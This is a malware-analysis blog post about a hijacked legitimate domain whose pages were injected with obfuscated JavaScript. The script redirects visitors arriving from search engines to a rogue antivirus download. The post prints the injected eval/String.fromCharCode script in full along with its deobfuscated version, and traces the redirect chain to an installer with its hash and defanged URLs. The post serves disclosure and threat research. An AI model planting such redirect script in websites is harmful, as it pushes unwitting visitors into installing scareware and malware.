Malware Database

More and more legitimate domains are being hijacked by inserting code in the webpage to redirect the unaware user to a drive-by download of rogue anti-malware programs. Many have reported on this trend and yet there is no stopping it.

I came across yet another hijacked domain that was redirecting users to webtrustrank1.net and then to the appropriate rogue website (fake scan). This hijack uses the same javascript to detect if the user came from a search engine and if so, they will be pushed to the next site. If they did not come from a search, they will simply see a screen with a lot of keywords used to trigger the search engines.

I haven’t ever posted the javascript code so I will below as well as the deobfuscated code.

eval(String.fromCharCode(102,117,110,99,116,105,111,110,32,102,40,41,123,13,10,
118,97,114,32,114,61,100,111,99,117,109,101,110,116,46,114,101,102,101,114,114,
101,114,44,116,61,34,34,44,113,59,32,13,10,105,102,40,114,46,105,110,100,101,
120,79,102,40,34,103,111,111,103,108,101,46,34,41,33,61,45,49,41,116,61,34,113,
34,59,32,13,10,105,102,40,114,46,105,110,100,101,120,79,102,40,34,109,115,110,
46,34,41,33,61,45,49,41,116,61,34,113,34,59,32,13,10,105,102,40,114,46,105,110,
100,101,120,79,102,40,34,121,97,104,111,111,46,34,41,33,61,45,49,41,116,61,34,112,
34,59,32,13,10,105,102,40,114,46,105,110,100,101,120,79,102,40,34,97,108,116,
97,118,105,115,116,97,46,34,41,33,61,45,49,41,116,61,34,113,34,59,32,13,10,105,
102,40,114,46,105,110,100,101,120,79,102,40,34,97,111,108,46,34,41,33,61,45,49,
41,116,61,34,113,117,101,114,121,34,59,32,13,10,105,102,40,114,46,105,110,100,
101,120,79,102,40,34,97,115,107,46,34,41,33,61,45,49,41,116,61,34,113,34,59,32,
13,10,105,102,40,114,46,105,110,100,101,120,79,102,40,34,99,111,109,99,97,115,
116,46,34,41,33,61,45,49,41,116,61,34,113,34,59,32,13,10,105,102,40,114,46,105,110,
100,101,120,79,102,40,34,98,101,108,108,115,111,117,116,104,46,34,41,33,61,45,49,
41,116,61,34,115,116,114,105,110,103,34,59,32,13,10,105,102,40,114,46,105,110,100,
101,120,79,102,40,34,110,101,116,115,99,97,112,101,46,34,41,33,61,45,49,41,116,61,
34,113,117,101,114,121,34,59,32,13,10,105,102,40,114,46,105,110,100,101,120,79,
102,40,34,109,121,119,101,98,115,101,97,114,99,104,46,34,41,33,61,45,49,41,116,61,
34,115,101,97,114,99,104,102,111,114,34,59,32,13,10,105,102,40,114,46,105,110,100,
101,120,79,102,40,34,112,101,111,112,108,101,112,99,46,34,41,33,61,45,49,41,116,61,
34,113,34,59,32,13,10,105,102,40,114,46,105,110,100,101,120,79,102,40,34,115,116,
97,114,119,97,114,101,46,34,41,33,61,45,49,41,116,61,34,113,114,121,34,59,32,13,10,
105,102,40,114,46,105,110,100,101,120,79,102,40,34,101,97,114,116,104,108,105,
110,107,46,34,41,33,61,45,49,41,116,61,34,113,34,59,32,13,10,105,102,40,116,46,108,
101,110,103,116,104,38,38,40,40,113,61,114,46,105,110,100,101,120,79,102,40,34,63,
34,43,116,43,34,61,34,41,41,33,61,45,49,124,124,40,113,61,114,46,105,110,100,101,120,
79,102,40,34,38,34,43,116,43,34,61,34,41,41,33,61,45,49,41,41,32,13,10,119,105,110,
100,111,119,46,108,111,99,97,116,105,111,110,32,61,32,40,34,104,116,116,112,58,47,
47,119,101,98,116,114,117,115,116,114,97,110,107,49,46,110,101,116,47,105,110,46,99,
103,105,63,57,38,115,101,111,114,101,102,61,34,43,101,110,99,111,100,101,85,82,73,
67,111,109,112,111,110,101,110,116,40,100,111,99,117,109,101,110,116,46,114,101,102,
101,114,114,101,114,41,43,34,38,112,97,114,97,109,101,116,101,114,61,36,107,101,121,
119,111,114,100,38,115,101,61,36,115,101,38,117,114,61,49,38,72,84,84,80,95,82,69,70,
69,82,69,82,61,34,43,101,110,99,111,100,101,85,82,73,67,111,109,112,111,110,101,110,
116,40,100,111,99,117,109,101,110,116,46,85,82,76,41,43,34,38,100,101,102,97,117,
108,116,95,107,101,121,119,111,114,100,61,100,101,102,97,117,108,116,34,41,59,32,
13,10,125,13,10,13,10,119,105,110,100,111,119,46,111,110,70,111,99,117,115,32,61,32,
102,40,41));

Deobfuscates to:

function f(){
var r=document.referrer,t=”",q;
if(r.indexOf(“google.”)!=-1)t=”q”;
if(r.indexOf(“msn.”)!=-1)t=”q”;
if(r.indexOf(“yahoo.”)!=-1)t=”p”;
if(r.indexOf(“altavista.”)!=-1)t=”q”;
if(r.indexOf(“aol.”)!=-1)t=”query”;
if(r.indexOf(“ask.”)!=-1)t=”q”;
if(r.indexOf(“comcast.”)!=-1)t=”q”;
if(r.indexOf(“bellsouth.”)!=-1)t=”string”;
if(r.indexOf(“netscape.”)!=-1)t=”query”;
if(r.indexOf(“mywebsearch.”)!=-1)t=”searchfor”;
if(r.indexOf(“peoplepc.”)!=-1)t=”q”;
if(r.indexOf(“starware.”)!=-1)t=”qry”;
if(r.indexOf(“earthlink.”)!=-1)t=”q”;
if(t.length&&((q=r.indexOf(“?”+t+”=”))!=-1||(q=r.indexOf(“&”+t+”=”))!=-1))
window.location = (“http://webtrustrank1.net/in.cgi?9&seoref=”+encodeURIComponent(
document.referrer)+”&parameter=$keyword&se=$se&ur=1&HTTP_REFERER=”+
encodeURIComponent(document.URL)+”&default_keyword=default”);
}
window.onFocus = f()

After clicking the hijacked link, we see the infamous scan screen which will then try to get the user to download and install. On this occasion it installed Personal Antivirus from malwareliveproscanv1.com. Below shows the way this redirects and through which domains. In this instance, the domain pbxstore.com was hijacked to start this process. At the time, I was searching for “patrick swayze dead” as many others have over the past 24-48 hours.

hxxp://webtrustrank1.net/in.cgi?9&seoref=hxxp%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3D
patrick%2Bswayze%2Bdead%253F%2B-publicist%2B-vox.com%26hl%3Den%26tbs%3Dqdr%3Ad%2C
sbd%3A1%26start%3D40%26sa%3DN&parameter=$keyword&se=$se&ur=1&hxxp_REFERER=hxxp
%3A%2F%2Fpbxstore.com%2Fiidde%2Fldzmd%2Fwalters.htm&default_keyword=default
redirects to
hxxp://webtrustrank1.net/redirect3/
redirects to
hxxp://advanedmalwarescanner.com/go.php?id=2004&key=ff0057594&p=1
redirects to
hxxp://malwareliveproscanv1.com/1/?id=2004&smersh=079dbf740&back=%3DTQz2Tj4MUQNMI%3DO

Install_2004.exe
Result: 1/40 (2.5%)
MD5: 3dc76043ecb49dc1294d2a7a4a5b7a98
VirusTotal
ThreatExpert Analysis
hxxp://malwareliveproscanv1.com/download/Install_2004.exe

Whois entry for webtrustrank1.com ( NS1.EVERYDNS.NET & NS2.EVERYDNS.NET)
Whois entry for adlaq.biz